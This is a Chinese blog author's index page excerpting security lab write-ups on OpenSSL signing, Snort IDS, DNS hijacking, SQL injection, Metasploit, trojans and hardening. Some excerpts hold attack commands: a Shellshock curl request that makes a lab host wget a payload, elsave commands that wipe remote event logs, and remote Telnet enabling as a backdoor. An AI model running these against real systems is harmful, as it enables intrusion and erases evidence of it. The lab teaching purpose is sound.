![](https://img-blog.csdnimg.cn/20201014180756738.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
网络安全学习
Grentee
这个作者很懒,什么都没留下…
展开
-
openssl数字签名
实验步骤1.创建明文文档plain.txt,写入内容。2. (打开bin目录下的exe文件运行)计算plain.txt的哈希值,输出到文件digest.txt。注意这个地方是sha1 =是数字1而不是字母L3.利用RSA算法对摘要进行签名。(1)创建1024位的RSA私钥,写入文件rsaprivatekey.pem,同时用3DES加密,设置密码。(2)从文件rsaprivatekey.pem中提取公钥,写入...原创 2021-11-13 17:20:53 · 3499 阅读 · 1 评论 -
网络入侵检测系统(IDS)的安装部署
安装snort入侵检测系统1、登录ids系统 登录实验机后,打开桌面上的putty程序,输入10.1.1.106,再点击Open.。 输入用户名:root,密码:bjhit 2、安装LAMP环境(省略) 在putty里面输入如下命令进行安装 apt-get install mysql-server libapache2-mod-php5 php5-mysql libphp-adodb 注意:因为下载时间太长,...原创 2021-11-13 17:18:01 · 2218 阅读 · 0 评论 -
域名劫持原理
实验步骤一实验中提供了一台邮件服务器,该服务器同时提供DNS服务,测试者通过入侵到该服务器,修改DNS服务中的正向解析与反向解析文件实现劫持。首先我们打开 http://mail.test.com,看到一个邮件登录入口。这里我们先使用burpsuite对该站点进行目录扫描。1、配置好IE代理,截取数据包。2、右键sendtospider。3、发现存在phpmyadmin。如果未出现请单击Filter将Hide empty folders(隐藏空文件夹)的勾去掉。...原创 2021-11-13 17:12:28 · 846 阅读 · 0 评论 -
SQL注入中information_schema的作用
实验步骤 information_schema数据库是MySQL自带的,MySQL 5以下没有这个数据库,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。也就是说information_schema中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。在INFORMATION_SCHEMA中,有数个只读表。 在phpmyadmin中,在左侧点击inform...原创 2021-11-13 17:03:31 · 1273 阅读 · 0 评论 -
Metasploit攻击win7实例
实验目的通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试、攻击。Nessus基本介绍Nessus是一个功能强大而又易于使用的网络和主机漏洞评估工具,分为免费的家庭版和付费的企业版。Nessus6.0以后采取Browser/Server模式,Server端负责进行安全检查、具体的扫描任务,客户端用来配置管理服务器端。服务端采用plug-in的体系,允许用户加入执行特定功能的插件,这插件可以进行更快原创 2021-10-26 22:24:15 · 156 阅读 · 0 评论 -
木马攻击实验
实验目的1、 理解掌握木马运行以及传播的原理。2、 通过手动删除木马,掌握检查木马和删除木马的技巧。3、 增强对木马的安全防范意识。预备知识 木马是隐藏在正常程序中的具有特殊功能恶意代码,是具备破坏,删除和修改文件,发送密码,记录键盘,实施Dos攻击甚至完全可能告知计算机等特殊功能的后门程序。它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。1、木马的传统连接技术 一般木马都采用C/S(client/server,即服务器...原创 2021-10-25 08:35:06 · 842 阅读 · 0 评论 -
破壳漏洞的原理与利用
使用ssh登录蠕虫发起者主机(10.1.1.231),执行下面三条命令。命令执行结果如下图所示。[root@worm-master ~]# tail /var/log/httpd/access_log[root@worm-master ~]# curl -A “() { :; }; /usr/bin/wget http://10.1.1.231/shock” http://10.1.1.12/test.cgi[root@worm-master ~]# tail /var/log/httpd/ac原创 2021-10-15 22:12:32 · 220 阅读 · 0 评论 -
2021-10-15
windows防火墙的高级设置“阻止对80端口的TCP连接”(即禁止访问Web服务器)打开浏览器,输入刚才测试的网站,已无法访问输入网址的IP地址,获取IP的方法为CMD里ping tools.hetianlab.com打开浏览器测试:证明网站为了安全而设置的禁ping策略...原创 2021-10-15 21:53:26 · 195 阅读 · 0 评论 -
系统后门种植实验-TELNET
在A主机开启手动Telnet主机A用net use命令建立ipc$连接,远程开启B主机telnet协议在B 主机查看Telnet状态用sc命令将telnet启动新建一个cmd环境进行telnet登录:telnet 10.1.1.119telnet服务登录到远程主机之后:net share建立c$共享查看共享目录远程更改telnet端口在本地主机禁止Telnet协议即可防止远程登录,或者在路由器防火墙禁止Telnet协议数据包...原创 2021-10-15 09:03:46 · 353 阅读 · 0 评论 -
PKI及SSL协议分析
HTTPS和HTTP的区别:https协议需要到ca申请证书,一般免费证书很少,需要交费。http是超文本传输协议,信息是明文传输,https 则是具有安全性的ssl加密传输协议 http和https使用的是完全不同的连接方式用的端口也不一样:前者是80,后者是443。...原创 2021-10-07 17:22:25 · 177 阅读 · 0 评论 -
安全通信协议SSH应用与分析
搭建SSH服务器 Server:安装OpenSSH.exe。 安装完成后,打开命令提示符ssh与telnet的不同点:1.telnet是明文传送;ssh是加密传送,并且支持压缩。2.telnet的默认端口号为23;ssh的默认端口号为22.3.ssh使用公钥对访问的服务器的用户验证身份,进一步提高的安全性;telnet没有使用公钥。...原创 2021-10-07 17:09:26 · 71 阅读 · 0 评论 -
MSSQL数据库安全
管理SQL认证模式 :在“服务器身份验证”选项区中,将身份验证模式,“Windows 身份验证模式”改为“SQL Server 和Windows 身份验证模式”,重启后在“摘要”面板中,右击“SQL Server 代理”,然后单击“启动”生效添加新用户:使winuser隶属于administrators新建数据库后将新加用户设为数据库用户添加成功后可在安全性-登录名于新数据库-安全性-用户中找到新加的用户验证用WinUser账号登录SQL Serve...原创 2021-09-22 15:31:27 · 137 阅读 · 0 评论 -
数据恢复原理
右键我的电脑,选中管理进行磁盘的划分与添加。使用winhex查看磁盘信息在E盘新建文本,删除后可使用winhex进行恢复也可以使用finaldata搜索相应磁盘中的删除文件进行恢复原创 2021-09-22 14:53:29 · 68 阅读 · 0 评论 -
Linux服务器通用安全加固
禁用不使用的用户禁用ipv6 IPv6是为了解决IPv4地址耗尽的问题,但我们的服务器一般用不到它,反而禁用IPv6不仅仅会加快网络,还会有助于减少管理开销和提高安全级别禁ping 阻止ping如果没人能ping通您的系统,安全性自然增加了,可以有效的防止ping洪水...原创 2021-09-14 20:35:48 · 72 阅读 · 0 评论 -
windows日志查看与清理
使用elsave清除日志工具先用ipc$管道进行连接,在cmd命令提示符下输入 net use \\对方IP(实验台IP)\ipc$ "密码" /user:"用户名"; 连接成功后,开始进行日志清除。清除目标系统的应用程序日志输入elsave.exe -s \\对方ip -l "application" -C清除目标系统的系统日志输入elsave.exe -s \\对方IP -l "system" -C清除目标系统的安全日志输入elsave.ex...原创 2021-09-14 20:10:35 · 735 阅读 · 0 评论 -
2021-09-14
删除、创建用户、组用户修改自己的用户密码可直接键入passwd,若修改其他用户密码需加用户名。超级用户还可以使用如下命令进行用户口令管理: passwd -l //禁用用户帐户口令 passwd -S //查看用户帐户口令状态 passwd -u //恢复用户帐户口令 passwd -d //删除用户帐户口令下面列出了chage命令的选项说明: -m days: 指定用户必须改变口令所间隔的最少天数。如果值为0,口令就不...原创 2021-09-14 19:59:00 · 73 阅读 · 0 评论 -
Windows Server 2008 系统加固
1.更改管理员账户名来避免此类攻击,提高系统安全性。如果更改帐户名仍然无法满足安全需求,可以选择将其禁用,然后创建一个普通的管理员账户,用户实现基本的系统或者网络管理、维护功能。删除多余用户使用NTFS文件系统检查Everyone权限WScript.Shell、Shell.application这两个组件一般一些ASP木马或一些恶意程序都会使用到。黑客在拿到webshell后,一般都是先通过这两个组件提权,为了服务器安全,应该卸载这些不安全组件。...原创 2021-09-14 17:52:13 · 86 阅读 · 0 评论 -
Linux档案权限篇之一
1.权限介绍连接数:每个文件都会将其权限与文件属性记录到文件系统的inode中,一个文档名就会链接一个inode。连接数就是记录有几个文档名记录到同一个inode中。用户组:这个档案所属的群组限权:第一个字符代表文档类型:d:目录;-:文件;l:链接文件(相当于快捷方式);b:设备(如硬盘);c:字符设备(鼠标、键盘)接下来三个字符为一组且为rwx的组合(可读、可写、可执行)没有改限权则再相应位置用-代替其中第一组为拥有者权限;第二组为同群组的权限;第三组为其他非本群组权..原创 2021-09-07 00:02:04 · 85 阅读 · 0 评论 -
Linux获取命令帮助
一共有1123个命令可被执行man date :显示详细的date的用法(manpage显示的内容文件放在/usr/share/man中)常用按键:man -f xxx :查找含有xxx的命令man -k xxx :只要含有xxx(哪怕被间隔)也可以被查找bzip2用来压缩和解压缩文件...原创 2021-09-06 22:54:12 · 98 阅读 · 0 评论 -
Linux 基础命令二
1.文件列表命令:ls:列出目录内容-a:列出所有目录(包括 . 开头与 .. 开头)-A:列出所有目录(不包括 . 开头与 .. 开头)-d /xxx:列出xxx目录本身但是不显示其数据信息-h:列出文件容量-l:列出文件属性限权等(ls -之后的参数可以叠加:ls -lh、ls -ad)2.cp /xx/yy/zz:将xx文件复制到zz目录下并重命名为yy-a:将文档限权、状态等一起复制-r:将资源下的目录名一并copy-f:删除目的文件存在的同名要的..原创 2021-09-04 20:09:57 · 87 阅读 · 0 评论 -
Linux 基础命令一
1.命令之后的参数若是单个字符用“ -”,若是单词用“ --”2.2.1.pwd:显示当前目录路径2.2.绝对路径:cd/xx/xx cd后的路径由根目录写起 相对路径:cd ../xx cd../后直接写最终文件名2.3. . :此层目录 .. :上一层目录 - :前一个工作目录 ...原创 2021-09-03 19:47:41 · 41 阅读 · 0 评论